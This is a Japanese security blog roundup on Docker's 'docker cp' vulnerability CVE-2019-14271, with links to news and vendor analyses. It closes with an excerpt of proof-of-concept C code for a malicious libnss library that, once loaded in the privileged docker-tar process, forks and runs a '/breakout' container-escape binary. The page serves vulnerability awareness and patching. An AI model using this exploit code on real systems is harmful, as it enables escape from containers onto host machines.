【ニュース】
◆「Docker」の既知脆弱性にPoC - 影響大きく更新状態の確認を (Security NEXT, 2019/11/22)
http://www.security-next.com/110066
【ブログ】
◆Docker、これまでで最も深刻な cp コマンドの脆弱性CVE-2019-14271を修正 (UNIT42(Paloalto), 2019/11/19)
https://unit42.paloaltonetworks.jp/docker-patched-the-most-severe-copy-vulnerability-to-date-with-cve-2019-14271/
⇒ https://malware-log.hatenablog.com/entry/2019/11/19/000000_4
◆CVE-2019-14271: Docker Copy(docker cp)の脆弱性を悪用する概念実証が公開される(Tenable, 2019/11/21)
https://jp.tenable.com/blog/cve-2019-14271-proof-of-concept-for-docker-copy-docker-cp-vulnerability-released
⇒ https://malware-log.hatenablog.com/entry/2019/11/21/000000_4
【関連まとめ記事】
◆Docker (まとめ)
https://malware-log.hatenablog.com/entry/Docker
【Exploit Code】
#include ... #define ORIGINAL_LIBNSS "/original_libnss_files.so.2" #define LIBNSS_PATH "/lib/x86_64-linux-gnu/libnss_files.so.2" bool is_priviliged(); __attribute__ ((constructor)) void run_at_link(void) { char * argv_break[2]; if (!is_priviliged()) return; rename(ORIGINAL_LIBNSS, LIBNSS_PATH); fprintf(log_fp, "switched back to the original libnss_file.so"); if (!fork()) { // Child runs breakout argv_break[0] = strdup("/breakout"); argv_break[1] = NULL; execve("/breakout", argv_break, NULL); } else wait(NULL); // Wait for child return; } bool is_priviliged() { FILE * proc_file = fopen("/proc/self/exe", "r"); if (proc_file != NULL) { fclose(proc_file); return false; // can open so /proc exists, not privileged } return true; // we're running in the context of docker-tar }